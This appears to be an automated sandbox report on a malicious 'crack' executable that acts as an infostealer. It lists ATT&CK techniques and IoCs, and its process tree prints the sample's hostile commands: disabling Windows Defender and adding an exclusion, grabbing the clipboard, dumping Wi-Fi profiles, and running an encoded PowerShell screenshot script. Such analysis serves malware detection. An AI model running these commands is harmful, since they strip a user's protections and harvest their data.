549f42781fac652ef7934675b018bf5536df71ad399b3bb87d3174a9bc310d9e

Analysis

max time kernel
9s
max time network
12s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
25/09/2024, 19:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Z-Launcher-GPS5-Crack.exe
Size

7.5MB
MD5

3df8c50e5ff81bdb6950b37ae3937e74
SHA1

4c84556c3f4e1b1d2dbc65f2e74374d4839a085e
SHA256

549f42781fac652ef7934675b018bf5536df71ad399b3bb87d3174a9bc310d9e
SHA512

ea565f36f68647cd48f65ed07d21963457f1f29e867a3671b53a2ac2448d94e4d8675c9fb768c4c08cce11bc3ffe562bd481b79eef7b6a5a664a185f5601f2fa
SSDEEP

196608:fBXOP9VgurErvI9pWjgfPvzm6gsFE14Au:ZeluurEUWjC3zDb04Au

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1316	powershell.exe
5976	powershell.exe
3152	powershell.exe
2064	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3592	cmd.exe
1580	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2256	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe
4960	Z-Launcher-GPS5-Crack.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	discord.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
4304	tasklist.exe
2664	tasklist.exe
3380	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x000100000002aad6-21.dat	upx
behavioral4/memory/4960-24-0x00007FFF362A0000-0x00007FFF36892000-memory.dmp	upx
behavioral4/files/0x000100000002aac9-27.dat	upx
behavioral4/memory/4960-30-0x00007FFF3AE00000-0x00007FFF3AE24000-memory.dmp	upx
behavioral4/files/0x000100000002aad4-31.dat	upx
behavioral4/files/0x000100000002aad3-33.dat	upx
behavioral4/memory/4960-48-0x00007FFF3F950000-0x00007FFF3F95F000-memory.dmp	upx
behavioral4/files/0x000100000002aad0-47.dat	upx
behavioral4/files/0x000100000002aacf-46.dat	upx
behavioral4/files/0x000100000002aace-45.dat	upx
behavioral4/files/0x000100000002aacd-44.dat	upx
behavioral4/files/0x000100000002aacc-43.dat	upx
behavioral4/files/0x000100000002aacb-42.dat	upx
behavioral4/files/0x000100000002aaca-41.dat	upx
behavioral4/files/0x000200000002aac8-40.dat	upx
behavioral4/files/0x000100000002aadb-39.dat	upx
behavioral4/files/0x000100000002aada-38.dat	upx
behavioral4/files/0x000100000002aad9-37.dat	upx
behavioral4/files/0x000100000002aad5-34.dat	upx
behavioral4/memory/4960-54-0x00007FFF3ADD0000-0x00007FFF3ADFD000-memory.dmp	upx
behavioral4/memory/4960-56-0x00007FFF3ECD0000-0x00007FFF3ECE9000-memory.dmp	upx
behavioral4/memory/4960-58-0x00007FFF3A340000-0x00007FFF3A363000-memory.dmp	upx
behavioral4/memory/4960-60-0x00007FFF369B0000-0x00007FFF36B2E000-memory.dmp	upx
behavioral4/memory/4960-62-0x00007FFF3C760000-0x00007FFF3C779000-memory.dmp	upx
behavioral4/memory/4960-64-0x00007FFF3F8C0000-0x00007FFF3F8CD000-memory.dmp	upx
behavioral4/memory/4960-66-0x00007FFF3A300000-0x00007FFF3A333000-memory.dmp	upx
behavioral4/memory/4960-74-0x00007FFF3AE00000-0x00007FFF3AE24000-memory.dmp	upx
behavioral4/memory/4960-73-0x00007FFF32310000-0x00007FFF32839000-memory.dmp	upx
behavioral4/memory/4960-71-0x00007FFF361D0000-0x00007FFF3629D000-memory.dmp	upx
behavioral4/memory/4960-70-0x00007FFF362A0000-0x00007FFF36892000-memory.dmp	upx
behavioral4/memory/4960-76-0x00007FFF3C600000-0x00007FFF3C614000-memory.dmp	upx
behavioral4/memory/4960-81-0x00007FFF3ECD0000-0x00007FFF3ECE9000-memory.dmp	upx
behavioral4/memory/4960-82-0x00007FFF360B0000-0x00007FFF361CC000-memory.dmp	upx
behavioral4/memory/4960-79-0x00007FFF3F880000-0x00007FFF3F88D000-memory.dmp	upx
behavioral4/memory/4960-78-0x00007FFF3ADD0000-0x00007FFF3ADFD000-memory.dmp	upx
behavioral4/memory/4960-106-0x00007FFF3A340000-0x00007FFF3A363000-memory.dmp	upx
behavioral4/memory/4960-148-0x00007FFF369B0000-0x00007FFF36B2E000-memory.dmp	upx
behavioral4/memory/4960-200-0x00007FFF3C760000-0x00007FFF3C779000-memory.dmp	upx
behavioral4/memory/4960-216-0x00007FFF3A300000-0x00007FFF3A333000-memory.dmp	upx
behavioral4/memory/4960-227-0x00007FFF361D0000-0x00007FFF3629D000-memory.dmp	upx
behavioral4/memory/4960-239-0x00007FFF32310000-0x00007FFF32839000-memory.dmp	upx
behavioral4/memory/4960-253-0x00007FFF3F880000-0x00007FFF3F88D000-memory.dmp	upx
behavioral4/memory/4960-252-0x00007FFF3C600000-0x00007FFF3C614000-memory.dmp	upx
behavioral4/memory/4960-240-0x00007FFF362A0000-0x00007FFF36892000-memory.dmp	upx
behavioral4/memory/4960-265-0x00007FFF361D0000-0x00007FFF3629D000-memory.dmp	upx
behavioral4/memory/4960-264-0x00007FFF3A300000-0x00007FFF3A333000-memory.dmp	upx
behavioral4/memory/4960-263-0x00007FFF3F8C0000-0x00007FFF3F8CD000-memory.dmp	upx
behavioral4/memory/4960-262-0x00007FFF3C760000-0x00007FFF3C779000-memory.dmp	upx
behavioral4/memory/4960-261-0x00007FFF369B0000-0x00007FFF36B2E000-memory.dmp	upx
behavioral4/memory/4960-260-0x00007FFF3A340000-0x00007FFF3A363000-memory.dmp	upx
behavioral4/memory/4960-259-0x00007FFF3ECD0000-0x00007FFF3ECE9000-memory.dmp	upx
behavioral4/memory/4960-258-0x00007FFF3ADD0000-0x00007FFF3ADFD000-memory.dmp	upx
behavioral4/memory/4960-257-0x00007FFF3F950000-0x00007FFF3F95F000-memory.dmp	upx
behavioral4/memory/4960-256-0x00007FFF3AE00000-0x00007FFF3AE24000-memory.dmp	upx
behavioral4/memory/4960-255-0x00007FFF32310000-0x00007FFF32839000-memory.dmp	upx
behavioral4/memory/4960-254-0x00007FFF360B0000-0x00007FFF361CC000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4972	cmd.exe
2532	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1708	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5744	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1316	powershell.exe
2064	powershell.exe
1316	powershell.exe
2064	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe
4928	powershell.exe
4928	powershell.exe
4928	powershell.exe
5976	powershell.exe
5976	powershell.exe
3012	powershell.exe
3012	powershell.exe
3152	powershell.exe
3152	powershell.exe
3384	powershell.exe
3384	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	4304	tasklist.exe
Token: SeDebugPrivilege	2664	tasklist.exe
Token: SeDebugPrivilege	3380	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5040	WMIC.exe
Token: SeSecurityPrivilege	5040	WMIC.exe
Token: SeTakeOwnershipPrivilege	5040	WMIC.exe
Token: SeLoadDriverPrivilege	5040	WMIC.exe
Token: SeSystemProfilePrivilege	5040	WMIC.exe
Token: SeSystemtimePrivilege	5040	WMIC.exe
Token: SeProfSingleProcessPrivilege	5040	WMIC.exe
Token: SeIncBasePriorityPrivilege	5040	WMIC.exe
Token: SeCreatePagefilePrivilege	5040	WMIC.exe
Token: SeBackupPrivilege	5040	WMIC.exe
Token: SeRestorePrivilege	5040	WMIC.exe
Token: SeShutdownPrivilege	5040	WMIC.exe
Token: SeDebugPrivilege	5040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5040	WMIC.exe
Token: SeRemoteShutdownPrivilege	5040	WMIC.exe
Token: SeUndockPrivilege	5040	WMIC.exe
Token: SeManageVolumePrivilege	5040	WMIC.exe
Token: 33	5040	WMIC.exe
Token: 34	5040	WMIC.exe
Token: 35	5040	WMIC.exe
Token: 36	5040	WMIC.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeIncreaseQuotaPrivilege	5040	WMIC.exe
Token: SeSecurityPrivilege	5040	WMIC.exe
Token: SeTakeOwnershipPrivilege	5040	WMIC.exe
Token: SeLoadDriverPrivilege	5040	WMIC.exe
Token: SeSystemProfilePrivilege	5040	WMIC.exe
Token: SeSystemtimePrivilege	5040	WMIC.exe
Token: SeProfSingleProcessPrivilege	5040	WMIC.exe
Token: SeIncBasePriorityPrivilege	5040	WMIC.exe
Token: SeCreatePagefilePrivilege	5040	WMIC.exe
Token: SeBackupPrivilege	5040	WMIC.exe
Token: SeRestorePrivilege	5040	WMIC.exe
Token: SeShutdownPrivilege	5040	WMIC.exe
Token: SeDebugPrivilege	5040	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5040	WMIC.exe
Token: SeRemoteShutdownPrivilege	5040	WMIC.exe
Token: SeUndockPrivilege	5040	WMIC.exe
Token: SeManageVolumePrivilege	5040	WMIC.exe
Token: 33	5040	WMIC.exe
Token: 34	5040	WMIC.exe
Token: 35	5040	WMIC.exe
Token: 36	5040	WMIC.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	5976	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeIncreaseQuotaPrivilege	5604	WMIC.exe
Token: SeSecurityPrivilege	5604	WMIC.exe
Token: SeTakeOwnershipPrivilege	5604	WMIC.exe
Token: SeLoadDriverPrivilege	5604	WMIC.exe
Token: SeSystemProfilePrivilege	5604	WMIC.exe
Token: SeSystemtimePrivilege	5604	WMIC.exe
Token: SeProfSingleProcessPrivilege	5604	WMIC.exe
Token: SeIncBasePriorityPrivilege	5604	WMIC.exe
Token: SeCreatePagefilePrivilege	5604	WMIC.exe
Token: SeBackupPrivilege	5604	WMIC.exe
Token: SeRestorePrivilege	5604	WMIC.exe
Token: SeShutdownPrivilege	5604	WMIC.exe
Token: SeDebugPrivilege	5604	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3692 wrote to memory of 4960	3692	Z-Launcher-GPS5-Crack.exe	78
PID 3692 wrote to memory of 4960	3692	Z-Launcher-GPS5-Crack.exe	78
PID 4960 wrote to memory of 4084	4960	Z-Launcher-GPS5-Crack.exe	79
PID 4960 wrote to memory of 4084	4960	Z-Launcher-GPS5-Crack.exe	79
PID 4960 wrote to memory of 5528	4960	Z-Launcher-GPS5-Crack.exe	80
PID 4960 wrote to memory of 5528	4960	Z-Launcher-GPS5-Crack.exe	80
PID 4960 wrote to memory of 5692	4960	Z-Launcher-GPS5-Crack.exe	81
PID 4960 wrote to memory of 5692	4960	Z-Launcher-GPS5-Crack.exe	81
PID 5528 wrote to memory of 1316	5528	cmd.exe	85
PID 5528 wrote to memory of 1316	5528	cmd.exe	85
PID 5692 wrote to memory of 5104	5692	cmd.exe	86
PID 5692 wrote to memory of 5104	5692	cmd.exe	86
PID 4084 wrote to memory of 2064	4084	cmd.exe	87
PID 4084 wrote to memory of 2064	4084	cmd.exe	87
PID 4960 wrote to memory of 6008	4960	Z-Launcher-GPS5-Crack.exe	88
PID 4960 wrote to memory of 6008	4960	Z-Launcher-GPS5-Crack.exe	88
PID 4960 wrote to memory of 2188	4960	Z-Launcher-GPS5-Crack.exe	89
PID 4960 wrote to memory of 2188	4960	Z-Launcher-GPS5-Crack.exe	89
PID 6008 wrote to memory of 4304	6008	cmd.exe	92
PID 6008 wrote to memory of 4304	6008	cmd.exe	92
PID 2188 wrote to memory of 2664	2188	cmd.exe	93
PID 2188 wrote to memory of 2664	2188	cmd.exe	93
PID 4960 wrote to memory of 2044	4960	Z-Launcher-GPS5-Crack.exe	94
PID 4960 wrote to memory of 2044	4960	Z-Launcher-GPS5-Crack.exe	94
PID 4960 wrote to memory of 3592	4960	Z-Launcher-GPS5-Crack.exe	95
PID 4960 wrote to memory of 3592	4960	Z-Launcher-GPS5-Crack.exe	95
PID 4960 wrote to memory of 2276	4960	Z-Launcher-GPS5-Crack.exe	98
PID 4960 wrote to memory of 2276	4960	Z-Launcher-GPS5-Crack.exe	98
PID 4960 wrote to memory of 5296	4960	Z-Launcher-GPS5-Crack.exe	101
PID 4960 wrote to memory of 5296	4960	Z-Launcher-GPS5-Crack.exe	101
PID 4960 wrote to memory of 4972	4960	Z-Launcher-GPS5-Crack.exe	102
PID 4960 wrote to memory of 4972	4960	Z-Launcher-GPS5-Crack.exe	102
PID 4960 wrote to memory of 1884	4960	Z-Launcher-GPS5-Crack.exe	104
PID 4960 wrote to memory of 1884	4960	Z-Launcher-GPS5-Crack.exe	104
PID 4960 wrote to memory of 5524	4960	Z-Launcher-GPS5-Crack.exe	107
PID 4960 wrote to memory of 5524	4960	Z-Launcher-GPS5-Crack.exe	107
PID 2044 wrote to memory of 5040	2044	cmd.exe	109
PID 2044 wrote to memory of 5040	2044	cmd.exe	109
PID 2276 wrote to memory of 3380	2276	cmd.exe	110
PID 2276 wrote to memory of 3380	2276	cmd.exe	110
PID 3592 wrote to memory of 1580	3592	cmd.exe	111
PID 3592 wrote to memory of 1580	3592	cmd.exe	111
PID 5296 wrote to memory of 2308	5296	cmd.exe	112
PID 5296 wrote to memory of 2308	5296	cmd.exe	112
PID 1884 wrote to memory of 5744	1884	cmd.exe	113
PID 1884 wrote to memory of 5744	1884	cmd.exe	113
PID 5524 wrote to memory of 4928	5524	cmd.exe	114
PID 5524 wrote to memory of 4928	5524	cmd.exe	114
PID 4972 wrote to memory of 2532	4972	cmd.exe	115
PID 4972 wrote to memory of 2532	4972	cmd.exe	115
PID 4960 wrote to memory of 3596	4960	Z-Launcher-GPS5-Crack.exe	116
PID 4960 wrote to memory of 3596	4960	Z-Launcher-GPS5-Crack.exe	116
PID 3596 wrote to memory of 812	3596	cmd.exe	118
PID 3596 wrote to memory of 812	3596	cmd.exe	118
PID 4960 wrote to memory of 2492	4960	Z-Launcher-GPS5-Crack.exe	119
PID 4960 wrote to memory of 2492	4960	Z-Launcher-GPS5-Crack.exe	119
PID 2492 wrote to memory of 1776	2492	cmd.exe	121
PID 2492 wrote to memory of 1776	2492	cmd.exe	121
PID 4960 wrote to memory of 4120	4960	Z-Launcher-GPS5-Crack.exe	122
PID 4960 wrote to memory of 4120	4960	Z-Launcher-GPS5-Crack.exe	122
PID 4120 wrote to memory of 1716	4120	cmd.exe	125
PID 4120 wrote to memory of 1716	4120	cmd.exe	125
PID 4928 wrote to memory of 2708	4928	powershell.exe	124
PID 4928 wrote to memory of 2708	4928	powershell.exe	124

C:\Users\Admin\AppData\Local\Temp\Z-Launcher-GPS5-Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Z-Launcher-GPS5-Crack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3692
- C:\Users\Admin\AppData\Local\Temp\Z-Launcher-GPS5-Crack.exe
  "C:\Users\Admin\AppData\Local\Temp\Z-Launcher-GPS5-Crack.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Z-Launcher-GPS5-Crack.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Z-Launcher-GPS5-Crack.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Enter the key', 0, 'Key', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5692
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Enter the key', 0, 'Key', 0+16);close()"
      4⤵
      PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6008
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2188
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2044
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2276
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5296
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4972
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1884
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5524
